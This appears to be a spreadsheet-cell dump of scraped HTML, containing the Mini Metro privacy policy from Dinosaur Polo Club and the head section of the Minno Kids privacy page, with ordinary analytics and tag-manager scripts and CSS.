id="menu-item-90" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-90"&gt;&lt;a href="https://dinopoloclub.com/news/"&gt;News&lt;/a&gt;&lt;/li&gt;&lt;li id="menu-item-84" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-84"&gt;&lt;a href="https://dinopoloclub.com/careers/"&gt;Careers&lt;/a&gt;&lt;/li&gt;&lt;li id="menu-item-91" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-91"&gt;&lt;a href="https://dinopoloclub.com/press/"&gt;Press&lt;/a&gt;&lt;/li&gt;&lt;li id="menu-item-1350" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1350"&gt;&lt;a href="https://dinopoloclub.com/support/"&gt;Support&lt;/a&gt;&lt;/li&gt;&lt;li id="menu-item-85" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-85"&gt;&lt;a href="https://dinopoloclub.com/contact/"&gt;Contact&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;ul class="social-links"&gt;&lt;li class="social-links__item"&gt;&lt;a href="https://twitter.com/dinopoloclub" title="Twitter"&gt;&lt;span class="social-icon"&gt;&lt;noscript&gt;&lt;img src="https://dinopoloclub.com/wp-content/uploads/2019/08/twitter.svg" alt="Twitter"&gt;&lt;/noscript&gt;&lt;img class="lazyload" src='data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20210%20140%22%3E%3C/svg%3E' data-src="https://dinopoloclub.com/wp-content/uploads/2019/08/twitter.svg" alt="Twitter"&gt;&lt;/span&gt;&lt;span class="social-network"&gt;Twitter&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="social-links__item"&gt;&lt;a href="https://www.facebook.com/dinopoloclub/" title="Facebook"&gt;&lt;span class="social-icon"&gt;&lt;noscript&gt;&lt;img src="https://dinopoloclub.com/wp-content/uploads/2019/08/facebook.svg" alt="Facebook"&gt;&lt;/noscript&gt;&lt;img class="lazyload" src='data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20210%20140%22%3E%3C/svg%3E' data-src="https://dinopoloclub.com/wp-content/uploads/2019/08/facebook.svg" alt="Facebook"&gt;&lt;/span&gt;&lt;span class="social-network"&gt;Facebook&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="social-links__item"&gt;&lt;a href="https://www.youtube.com/channel/UC8PoS0kI5X0EReM-D0vm7ag" title="YouTube"&gt;&lt;span class="social-icon"&gt;&lt;noscript&gt;&lt;img src="https://dinopoloclub.com/wp-content/uploads/2019/08/youtube.svg" alt="YouTube"&gt;&lt;/noscript&gt;&lt;img class="lazyload" src='data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20210%20140%22%3E%3C/svg%3E' data-src="https://dinopoloclub.com/wp-content/uploads/2019/08/youtube.svg" alt="YouTube"&gt;&lt;/span&gt;&lt;span class="social-network"&gt;YouTube&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="social-links__item"&gt;&lt;a href="https://www.instagram.com/dinopoloclub/" title="Instagram"&gt;&lt;span class="social-icon"&gt;&lt;noscript&gt;&lt;img src="https://dinopoloclub.com/wp-content/uploads/2021/05/instagram.svg" alt="Instagram"&gt;&lt;/noscript&gt;&lt;img class="lazyload" src='data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20210%20140%22%3E%3C/svg%3E' data-src="https://dinopoloclub.com/wp-content/uploads/2021/05/instagram.svg" alt="Instagram"&gt;&lt;/span&gt;&lt;span class="social-network"&gt;Instagram&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/nav&gt;&lt;/div&gt;&lt;/header&gt;&lt;div id="content" class="site-content"&gt;&lt;div id="primary" class="content-area"&gt;&lt;main id="main" class="site-main"&gt;&lt;article id="post-744" class="post-744 page type-page status-publish hentry"&gt;&lt;header class="entry-header"&gt;&lt;h1 class="entry-title"&gt;Privacy Policy: Mini Metro&lt;/h1&gt;&lt;/header&gt;&lt;div class="entry-content"&gt;&lt;h2&gt;Leaderboards&lt;/h2&gt;&lt;p&gt;If you run the game through Steam or GOG Galaxy, we use their leaderboard systems.</t>
  </si>
  <si>
    <t>If you got the game from Humble or any other storefront, we use Facebook&amp;#8217;s authentication to log you on to our external leaderboard system, GameSparks.&lt;/p&gt;&lt;p&gt;To do so we store your Facebook authentication token in our database, and send it securely to GameSparks. They use this to match each submitted score to a user, and to display each user&amp;#8217;s name on the leaderboard.&lt;/p&gt;&lt;p&gt;We do not store any personal information or location-based data. We do not share any information that we have access to with anyone except GameSparks.&lt;/p&gt;&lt;h2&gt;Web requests&lt;/h2&gt;&lt;p&gt;All editions of the game (with the exception of the Steam and GOG edition) perform a version check on startup by making a request to http://api.dinopoloclub.com/1/minimetro/version/&amp;lt;edition&amp;gt;.json.</t>
  </si>
  <si>
    <t>This creates a log on the webserver which contains your IP address and the time of the request, but no other personally-identifying information.&lt;/p&gt;&lt;p&gt;When starting up the game a request is made to http://api.dinopoloclub.com/1/minimetro/challenge.json to request the current daily challenge. This creates a log on the webserver which contains your IP address and the time of the request, but no other personally-identifying information.&lt;/p&gt;&lt;h2&gt;Crash reporting&lt;/h2&gt;&lt;p&gt;In the event of a crash, the game transmits information about the crash, and anonymous data about your system, to Unity&amp;#8217;s exception reporting database. We use this information to help find and fix bugs in the game.</t>
  </si>
  <si>
    <t>This information contains your IP address and the time of the crash, but no other personally-identifying information.&lt;/p&gt;&lt;h2&gt;Questions?&lt;/h2&gt;&lt;p&gt; If you have any questions about how we handle your data, please email us at support@dinopoloclub.com.&lt;/p&gt;&lt;/div&gt;&lt;/article&gt;&lt;/main&gt;&lt;/div&gt;&lt;/div&gt;&lt;footer id="colophon" class="site-footer"&gt;&lt;div class="site-info"&gt;&lt;div class="dpc-title"&gt; Dinosaur Polo Club&lt;/div&gt;&lt;div class="social-cta"&gt;&lt;p class="title"&gt;Social:&lt;/p&gt;&lt;ul class="social-links"&gt;&lt;li class="social-links__item"&gt;&lt;a href="https://twitter.com/dinopoloclub" title="Twitter"&gt;&lt;span class="social-icon"&gt;&lt;noscript&gt;&lt;img src="https://dinopoloclub.com/wp-content/uploads/2019/08/twitter.svg" alt="Twitter"&gt;&lt;/noscript&gt;&lt;img class="lazyload" src='data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20210%20140%22%3E%3C/svg%3E' data-src="https://dinopoloclub.com/wp-content/uploads/2019/08/twitter.svg" alt="Twitter"&gt;&lt;/span&gt;&lt;span class="social-network"&gt;Twitter&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="social-links__item"&gt;&lt;a href="https://www.facebook.com/dinopoloclub/" title="Facebook"&gt;&lt;span class="social-icon"&gt;&lt;noscript&gt;&lt;img src="https://dinopoloclub.com/wp-content/uploads/2019/08/facebook.svg" alt="Facebook"&gt;&lt;/noscript&gt;&lt;img class="lazyload" src='data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20210%20140%22%3E%3C/svg%3E' data-src="https://dinopoloclub.com/wp-content/uploads/2019/08/facebook.svg" alt="Facebook"&gt;&lt;/span&gt;&lt;span class="social-network"&gt;Facebook&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="social-links__item"&gt;&lt;a href="https://www.youtube.com/channel/UC8PoS0kI5X0EReM-D0vm7ag" title="YouTube"&gt;&lt;span class="social-icon"&gt;&lt;noscript&gt;&lt;img src="https://dinopoloclub.com/wp-content/uploads/2019/08/youtube.svg" alt="YouTube"&gt;&lt;/noscript&gt;&lt;img class="lazyload" src='data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20210%20140%22%3E%3C/svg%3E' data-src="https://dinopoloclub.com/wp-content/uploads/2019/08/youtube.svg" alt="YouTube"&gt;&lt;/span&gt;&lt;span class="social-network"&gt;YouTube&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="social-links__item"&gt;&lt;a href="https://www.instagram.com/dinopoloclub/" title="Instagram"&gt;&lt;span class="social-icon"&gt;&lt;noscript&gt;&lt;img src="https://dinopoloclub.com/wp-content/uploads/2021/05/instagram.svg" alt="Instagram"&gt;&lt;/noscript&gt;&lt;img class="lazyload" src='data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20210%20140%22%3E%3C/svg%3E' data-src="https://dinopoloclub.com/wp-content/uploads/2021/05/instagram.svg" alt="Instagram"&gt;&lt;/span&gt;&lt;span class="social-network"&gt;Instagram&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div class="quick-signup"&gt;&lt;p class="title"&gt;Newsletter:&lt;/p&gt;&lt;form action="https://sendy.dinopoloclub.com/subscribe" method="POST" accept-charset="utf-8" class="subscribe"&gt;&lt;div class="details"&gt;&lt;div class="languages"&gt; &lt;select class="language-select"&gt;&lt;option value="LiAPUPNTMSOVf2HTq6wkzA"&gt;English&lt;/option&gt;&lt;option value="WdmTBY763ek4Zaghp2iDXy7w"&gt;Français&lt;/option&gt;&lt;option value="Zn9hLJrqI8VB5ZWpvHj6mw"&gt;Deutsch&lt;/option&gt;&lt;option value="9p2tt7636obZ0stIt6krGjFg"&gt;简体中文&lt;/option&gt; &lt;/select&gt;&lt;/div&gt;&lt;div class="email"&gt; &lt;label for="email"&gt;Email&lt;/label&gt; &lt;input type="email" name="email" id="email" placeholder="Email address"/&gt;&lt;/div&gt;&lt;div style="display:none;"&gt; &lt;label for="hp"&gt;HP&lt;/label&gt;&lt;br/&gt;</t>
  </si>
  <si>
    <t>&lt;input type="text" name="hp" id="hp"/&gt;&lt;/div&gt; &lt;input type="hidden" name="list" value="LiAPUPNTMSOVf2HTq6wkzA"/&gt; &lt;input type="hidden" name="subform" value="yes"/&gt; &lt;span class="submit"&gt;&lt;input type="submit" name="submit" id="submit"/&gt;&lt;/span&gt;&lt;/div&gt;&lt;p class="button-terms"&gt;View our email policy&lt;/p&gt;&lt;div class="terms"&gt;&lt;p&gt; &lt;input type="checkbox" name="gdpr" id="gdpr" checked/&gt; &lt;strong&gt;Marketing permission&lt;/strong&gt;: I give my consent for you to be in touch with me via email using the information I have provided in this form for the purpose of news, updates and marketing.&lt;/p&gt;&lt;p&gt; &lt;strong&gt;</t>
  </si>
  <si>
    <t>What to expect&lt;/strong&gt;: If you wish to withdraw your consent and stop hearing from us, simply click the unsubscribe link at the bottom of every email we send or contact us at &lt;a href="mailto:info@dinopoloclub.com"&gt;info@dinopoloclub.com&lt;/a&gt;. We value and respect your personal data and privacy. To view our privacy policy, please visit our website.</t>
  </si>
  <si>
    <t>By submitting this form, you agree that we may process your information in accordance with these terms.&lt;/p&gt;&lt;/div&gt;&lt;/form&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="lower-footer"&gt;&lt;div class="footer-links"&gt;&lt;div class="menu-footer-menu-container"&gt;&lt;ul id="footer-menu" class="menu"&gt;&lt;li id="menu-item-181" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-181"&gt;&lt;a href="https://dinopoloclub.com/"&gt;Homepage&lt;/a&gt;&lt;/li&gt;&lt;li id="menu-item-182" class="menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor menu-item-182"&gt;&lt;a href="https://dinopoloclub.com/games/"&gt;Games&lt;/a&gt;&lt;/li&gt;&lt;li id="menu-item-183" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-183"&gt;&lt;a href="https://dinopoloclub.com/about/"&gt;About&lt;/a&gt;&lt;/li&gt;&lt;li id="menu-item-1235" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1235"&gt;&lt;a href="https://dinopoloclub.com/news/"&gt;News&lt;/a&gt;&lt;/li&gt;&lt;li id="menu-item-184" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-184"&gt;&lt;a href="https://dinopoloclub.com/careers/"&gt;Careers&lt;/a&gt;&lt;/li&gt;&lt;li id="menu-item-1236" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1236"&gt;&lt;a href="https://dinopoloclub.com/press/"&gt;Press&lt;/a&gt;&lt;/li&gt;&lt;li id="menu-item-1351" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1351"&gt;&lt;a href="https://dinopoloclub.com/support/"&gt;Support&lt;/a&gt;&lt;/li&gt;&lt;li id="menu-item-185" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-185"&gt;&lt;a href="https://dinopoloclub.com/contact/"&gt;Contact&lt;/a&gt;&lt;/li&gt;&lt;li id="menu-item-191" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy menu-item-191"&gt;&lt;a href="https://dinopoloclub.com/privacy-policy/"&gt;Privacy&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;p class="copyright"&gt; &amp;copy;2023 Dinosaur Polo Club. All rights reserved.</t>
  </si>
  <si>
    <t>&lt;span class="credits"&gt;Site design by &lt;a href="https://www.fullyillustrated.com" title="Game UI. Game Art. Website Design.</t>
  </si>
  <si>
    <t>Illustration. Branding. Animation and much more… Fully Illustrated"&gt;Fully Illustrated&lt;/a&gt;&lt;/span&gt; &lt;span class="credits"&gt;Build by &lt;a href="https://dekiru.uk" title="Dekiru:</t>
  </si>
  <si>
    <t>Website design and build for the video games industry"&gt;Dekiru&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;/footer&gt;&lt;/div&gt; &lt;noscript&gt;&lt;style&gt;.lazyload{display:none;}&lt;/style&gt;&lt;/noscript&gt;&lt;script data-noptimize="1"&gt;window.lazySizesConfig=window.lazySizesConfig||{};window.lazySizesConfig.loadMode=1;&lt;/script&gt;&lt;script async data-noptimize="1" src='https://dinopoloclub.com/wp-content/plugins/autoptimize/classes/external/js/lazysizes.min.js?ao_version=3.1.5'&gt;&lt;/script&gt;&lt;script type='text/javascript' src='//ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js' id='jquery-js'&gt;&lt;/script&gt; &lt;script type='text/javascript' src='//cdnjs.cloudflare.com/ajax/libs/gsap/2.1.3/TweenMax.min.js' id='tween-max-js'&gt;&lt;/script&gt; &lt;script type='text/javascript' src='//cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.9.0/slick.min.js' id='slick-js'&gt;&lt;/script&gt; &lt;script defer src="https://dinopoloclub.com/wp-content/cache/autoptimize/js/autoptimize_13a77f8742567f8c5b3e6cf279abeb24.js"&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">
&lt;!doctype html&gt;
&lt;html class="no-js" dir="ltr" lang="en-US"
	prefix="og: https://ogp.me/ns#" &gt;
&lt;head&gt;
  &lt;!--START Lightbox Javascript--&gt;
&lt;script async type='text/javascript' src='https://www.lightboxcdn.com/vendor/94cc2d20-4992-4703-83c3-588d62539d0e/lightbox_inline.js'&gt;&lt;/script&gt;
&lt;!-- Hotjar Tracking Code for https://www.gominno.com --&gt;
&lt;script&gt;
    (function(h,o,t,j,a,r){
        h.hj=h.hj||function(){(h.hj.q=h.hj.q||[]).push(arguments)};
        h._hjSettings={hjid:2697099,hjsv:6};
        a=o.getElementsByTagName('head')[0];
        r=o.createElement('script');r.async=1;
        r.src=t+h._hjSettings.hjid+j+h._hjSettings.hjsv;
        a.appendChild(r);
    })(window,document,'https://static.hotjar.com/c/hotjar-','.js?sv=');
&lt;/script&gt;
&lt;!--END Lightbox Javascript--&gt;
    &lt;script&gt;
    window['friendbuy'] = window['friendbuy'] ||</t>
  </si>
  <si>
    <t>[];
    window['friendbuy'].push(['site', 'site-58d9ec23-www.gominno.com']);
    (function(f, r, n, d, b, y) {
        b = f.createElement(r), y = f.getElementsByTagName(r)[0];
        b.async = 1;
        b.src = n;
        y.parentNode.insertBefore(b, y);
    })(document, 'script', '//djnf6e5yyirys.cloudfront.net/js/friendbuy.min.js');
    &lt;/script&gt;
    &lt;meta charset="utf-8"&gt;
    &lt;!-- Force IE to use the latest rendering engine available --&gt;
    &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;
    &lt;!-- Mobile Meta --&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;
    &lt;meta class="foundation-mq"&gt;
    &lt;!--</t>
  </si>
  <si>
    <t>If Site Icon isn't set in customizer --&gt;
    &lt;link rel="pingback" href="https://www.gominno.com/xmlrpc.php"&gt;
    &lt;title&gt;Privacy | Minno Kids&lt;/title&gt;
		&lt;!-- All in One SEO Pro 4.2.6 - aioseo.com --&gt;
		&lt;meta name="robots" content="max-image-preview:large" /&gt;
		&lt;link rel="canonical" href="https://www.gominno.com/privacy/" /&gt;
		&lt;meta name="generator" content="All in One SEO Pro (AIOSEO) 4.2.6 " /&gt;
		&lt;meta property="og:locale" content="en_US" /&gt;
		&lt;meta property="og:site_name" content="Minno - Stories Kids Love, Values Parents Trust" /&gt;
		&lt;meta property="og:type" content="article" /&gt;
		&lt;meta property="og:title" content="Privacy | Minno Kids" /&gt;
		&lt;meta property="og:url" content="https://www.gominno.com/privacy/" /&gt;
		&lt;meta property="og:image" content="https://www.gominno.com/wp-content/uploads/2020/05/FacebookAd_Image1_Characters.jpg" /&gt;
		&lt;meta property="og:image:secure_url" content="https://www.gominno.com/wp-content/uploads/2020/05/FacebookAd_Image1_Characters.jpg" /&gt;
		&lt;meta property="og:image:width" content="1200" /&gt;
		&lt;meta property="og:image:height" content="628" /&gt;
		&lt;meta property="article:published_time" content="2020-11-03T23:29:20+00:00" /&gt;
		&lt;meta property="article:modified_time" content="2022-08-03T03:31:55+00:00" /&gt;
		&lt;meta property="article:publisher" content="https://www.facebook.com/Minno/" /&gt;
		&lt;meta name="twitter:card" content="summary" /&gt;
		&lt;meta name="twitter:site" content="@go_minno" /&gt;
		&lt;meta name="twitter:title" content="Privacy | Minno Kids" /&gt;
		&lt;meta name="twitter:image" content="https://www.gominno.com/wp-content/uploads/2020/05/FacebookAd_Image1_Characters.jpg" /&gt;
		&lt;script type="application/ld+json" class="aioseo-schema"&gt;
			{"@context":"https:\/\/schema.org","@graph":[{"@type":"BreadcrumbList","@id":"https:\/\/www.gominno.com\/privacy\/#breadcrumblist","itemListElement":[{"@type":"ListItem","@id":"https:\/\/www.gominno.com\/#listItem","position":1,"item":{"@type":"WebPage","@id":"https:\/\/www.gominno.com\/","name":"Home","description":"Watch good grow, every day. Share Jesus with your kids by instantly streaming faith-filled shows.</t>
  </si>
  <si>
    <t>","url":"https:\/\/www.gominno.com\/"},"nextItem":"https:\/\/www.gominno.com\/privacy\/#listItem"},{"@type":"ListItem","@id":"https:\/\/www.gominno.com\/privacy\/#listItem","position":2,"item":{"@type":"WebPage","@id":"https:\/\/www.gominno.com\/privacy\/","name":"Privacy","url":"https:\/\/www.gominno.com\/privacy\/"},"previousItem":"https:\/\/www.gominno.com\/#listItem"}]},{"@type":"Organization","@id":"https:\/\/www.gominno.com\/#organization","name":"Minno Kids","url":"https:\/\/www.gominno.com\/","logo":{"@type":"ImageObject","url":"https:\/\/www.gominno.com\/wp-content\/uploads\/2021\/04\/FacebookAd_Image1_CharactersUPDATED.png","@id":"https:\/\/www.gominno.com\/#organizationLogo","width":3280,"height":1712,"caption":"Vertebrate - Human behavior"},"image":{"@id":"https:\/\/www.gominno.com\/#organizationLogo"},"sameAs":["https:\/\/www.facebook.com\/Minno\/","https:\/\/twitter.com\/go_minno","https:\/\/www.instagram.com\/gominno\/","https:\/\/www.pinterest.com\/gominno\/_created\/"],"contactPoint":{"@type":"ContactPoint","telephone":"+16152975010","contactType":"Customer Support"}},{"@type":"WebPage","@id":"https:\/\/www.gominno.com\/privacy\/#webpage","url":"https:\/\/www.gominno.com\/privacy\/","name":"Privacy | Minno Kids","inLanguage":"en-US","isPartOf":{"@id":"https:\/\/www.gominno.com\/#website"},"breadcrumb":{"@id":"https:\/\/www.gominno.com\/privacy\/#breadcrumblist"},"datePublished":"2020-11-03T23:29:20-06:00","dateModified":"2022-08-03T03:31:55-05:00"},{"@type":"WebPage","@id":"https:\/\/www.gominno.com\/privacy\/#webpage","url":"https:\/\/www.gominno.com\/privacy\/","name":"Privacy | Minno Kids","inLanguage":"en-US","isPartOf":{"@id":"https:\/\/www.gominno.com\/#website"},"breadcrumb":{"@id":"https:\/\/www.gominno.com\/privacy\/#breadcrumblist"},"datePublished":"2020-11-03T23:29:20-06:00","dateModified":"2022-08-03T03:31:55-05:00"},{"@type":"WebSite","@id":"https:\/\/www.gominno.com\/#website","url":"https:\/\/www.gominno.com\/","name":"Minno Kids","description":"Stories Kids Love, Values Parents Trust","inLanguage":"en-US","publisher":{"@id":"https:\/\/www.gominno.com\/#organization"}}]}
		&lt;/script&gt;
		&lt;!-- All in One SEO Pro --&gt;
&lt;!-- Google Tag Manager for WordPress by gtm4wp.com --&gt;
&lt;script data-cfasync="false" data-pagespeed-no-defer&gt;
	var gtm4wp_datalayer_name = "dataLayer";
	var dataLayer = dataLayer ||</t>
  </si>
  <si>
    <t>[];
&lt;/script&gt;
&lt;!-- End Google Tag Manager for WordPress by gtm4wp.com --&gt;&lt;meta property="og:title" content="Privacy | Minno Kids"&gt;
&lt;meta property="twitter:title" content="Privacy | Minno Kids"&gt;
&lt;meta property="og:description" content="Privacy Policy Last Updated: January 6, 2021 Winsome Truth, Inc. (“Minno Kids,” “we,” “our,” or “us”) takes your privacy seriously.</t>
  </si>
  <si>
    <t>Please take a moment to review this Privacy Policy (“Privacy Policy”), which describes how Minno Kids collects, uses, and shares your personal information. Minno Kids provides a subscription video service offering a selection of streaming... Read more"&gt;
&lt;meta name="twitter:description" content="Privacy Policy Last Updated: January 6, 2021 Winsome Truth, Inc. (“Minno Kids,” “we,” “our,” or “us”) takes your privacy seriously.</t>
  </si>
  <si>
    <t>Please take a moment to review this Privacy Policy (“Privacy Policy”), which describes how Minno Kids collects, uses, and shares your personal information. Minno Kids provides a subscription video service offering a selection of streaming... Read more"&gt;
&lt;meta name="twitter:card" content="summary_large_image"&gt;
&lt;meta name="twitter:image" content="https://www.gominno.com/wp-content/uploads/2022/08/minno-kids-privacy-open-graph.jpg?last_updated=1659497523"&gt;
&lt;meta property="og:image:width" content="1200"&gt;
&lt; meta property="og:image:height" content="630"&gt;
&lt;meta property="og:image" content="https://www.gominno.com/wp-content/uploads/2022/08/minno-kids-privacy-open-graph.jpg?last_updated=1659497523"&gt;
&lt;meta property="og:image:secure_url" content="https://www.gominno.com/wp-content/uploads/2022/08/minno-kids-privacy-open-graph.jpg?last_updated=1659497523"&gt;
&lt;link rel='dns-prefetch' href='//www.googletagmanager.com' /&gt;
&lt;link rel='dns-prefetch' href='//use.fontawesome.com' /&gt;
&lt;link rel='dns-prefetch' href='//pagead2.googlesyndication.com' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Minno Kids &amp;raquo; Feed" href="https://www.gominno.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Minno Kids &amp;raquo; Comments Feed" href="https://www.gominno.com/comments/feed/" /&gt;
&lt;script type="text/javascript"&gt;
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.gominno.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};
/*!</t>
  </si>
  <si>
    <t>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 o.length;r++)t.supports[o[r]]=function(e){if(p&amp;&amp;p.fillText)switch(p.textBaseline="top",p.font="600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[129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}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</si>
  <si>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 gominno.com is managing ads with Advanced Ads 1.40.1 --&gt;&lt;script id="gominad-ready"&gt;
			window.advanced_ads_ready=function(e,a){a=a||"complete";var d=function(e){return"interactive"===a?"loading"!==e:"complete"===e};d(document.readyState)?e():document.addEventListener("readystatechange",(function(a){d(a.target.readyState)&amp;&amp;e()}),{once:"interactive"===a})},window.advanced_ads_ready_queue=window.advanced_ads_ready_queue||[];		&lt;/script&gt;
		&lt;style type="text/css"&gt;
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !</t>
  </si>
  <si>
    <t>important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link rel='stylesheet' id='wp-block-library-css' href='https://www.gominno.com/wp-includes/css/dist/block-library/style.min.css?ver=6.1.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='https://www.gominno.com/wp-includes/css/classic-themes.min.css?ver=1'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 2em;}body .is-layout-flow &gt; .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-flow &gt; .aligncenter{margin-left: auto !important;margin-right: auto !</t>
  </si>
  <si>
    <t xml:space="preserve">important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) ! important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
&lt;/style&gt;
&lt;style id='if-so-public-dummy-inline-css' type='text/css'&gt;
        .lds-dual-ring {
          display: inline-block;
          width: 16px;
          height: 16px;
        }
        .lds-dual-ring:after {
          content: " ";
          display: block;
          width: 16px;
          height: 16px;
          margin: 0px;
          border-radius: 50%;
          border: 3px solid #000;
          border-color: #000 transparent #000 transparent;
          animation: lds-dual-ring 1.2s linear infinite;
        }
        @keyframes lds-dual-ring {
          0% {
            transform: rotate(0deg);
          }
          100% {
            transform: rotate(360deg);
          }
        }
        /*loader 2*/
        .ifso-logo-loader {
            font-size: 20px;
            width: 64px;
            </t>
  </si>
  <si>
    <t>font-family: sans-serif;
            position: relative;
            height: auto;
            font-weight: 800;
        }
        .ifso-logo-loader:before {
            content: '';
            position: absolute;
            left: 30%;
            top: 36%;
            width: 14px;
            height: 22px;
            clip-path: polygon(100% 50%, 0 0, 0 100%);
            background: #fd5b56;
            animation: spinAndMoveArrow 2s infinite;
            height: 9px;
            width: 7px;
        }
        .ifso-logo-loader:after {
            content: "If So";
            word-spacing: 12px;
        }
        @keyframes spinAndMoveArrow {
                40% {
                    transform: rotate(360deg);
                }
                60% {
                    transform: translateX(-5px);
                }
                80% {
                    transform: translateX(5px);
                }
                100% {
                    transform: translateX(0);
                }
        }
        /*Loader 3 - default content*/
        .ifso-default-content-loader{
            display:inline-block;
        }
&lt;/style&gt;
&lt;link rel='stylesheet' id='wp-crawler-html-css' href='https://www.gominno.com/wp-content/plugins/wp-crawler-html/public/css/wp-crawler-html-public.css?ver=1.0.0' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='font-awesome-official-css' href='https://use.fontawesome.com/releases/v5.15.3/css/all.css' type='text/css' media='all' integrity="sha384-SZXxX4whJ79/gErwcOYf+zWLeJdY/qpuqC4cAa9rOGUstPomtqpuNWT9wdPEn2fk" crossorigin="anonymous" /&gt;
&lt;link rel='stylesheet' id='forget-about-shortcode-buttons-css' href='https://www.gominno.com/wp-content/plugins/forget-about-shortcode-buttons/public/css/button-styles.css?ver=2.1.2' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='foundation-css-css' href='https://www.gominno.com/wp-content/themes/gominno/foundation-sites/dist/css/foundation.min.css?ver=6.4.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='site-css-css' href='https://www.gominno.com/wp-content/themes/gominno/assets/styles/style.css?ver=1618578891' type='text/css' media='all' /&gt;
&lt;style id='rocket-lazyload-inline-css' type='text/css'&gt;
.rll-youtube-player{position:relative;padding-bottom:56.23%;height:0;overflow:hidden;max-width:100%;}.rll-youtube-player iframe{position:absolute;top:0;left:0;width:100%;height:100%;z-index:100;background:0 0}.rll-youtube-player img{bottom:0;display:block;left:0;margin:auto;max-width:100%;width:100%;position:absolute;right:0;top:0;border:none;height:auto;cursor:pointer;-webkit-transition:.4s all;-moz-transition:.4s all;transition:.4s all}.rll-youtube-player img:hover{-webkit-filter:brightness(75%)}.rll-youtube-player .play{height:72px;width:72px;left:50%;top:50%;margin-left:-36px;margin-top:-36px;position:absolute;background:url(https://www.gominno.com/wp-content/plugins/rocket-lazy-load/assets/img/youtube.png) no-repeat;cursor:pointer}
&lt;/style&gt;
&lt;link rel='stylesheet' id='font-awesome-official-v4shim-css' href='https://use.fontawesome.com/releases/v5.15.3/css/v4-shims.css' type='text/css' media='all' integrity="sha384-C2B+KlPW+WkR0Ld9loR1x3cXp7asA0iGVodhCoJ4hwrWm/d9qKS59BGisq+2Y0/D" crossorigin="anonymous" /&gt;
&lt;style id='font-awesome-official-v4shim-inline-css' type='text/css'&gt;
@font-face {
font-family: "FontAwesome";
font-display: block;
src: url("https://use.fontawesome.com/releases/v5.15.3/webfonts/fa-brands-400.eot"),
		url("https://use.fontawesome.com/releases/v5.15.3/webfonts/fa-brands-400.eot?#iefix") format("embedded-opentype"),
		url("https://use.fontawesome.com/releases/v5.15.3/webfonts/fa-brands-400.woff2") format("woff2"),
		url("https://use.fontawesome.com/releases/v5.15.3/webfonts/fa-brands-400.woff") format("woff"),
		url("https://use.fontawesome.com/releases/v5.15.3/webfonts/fa-brands-400.ttf") format("truetype"),
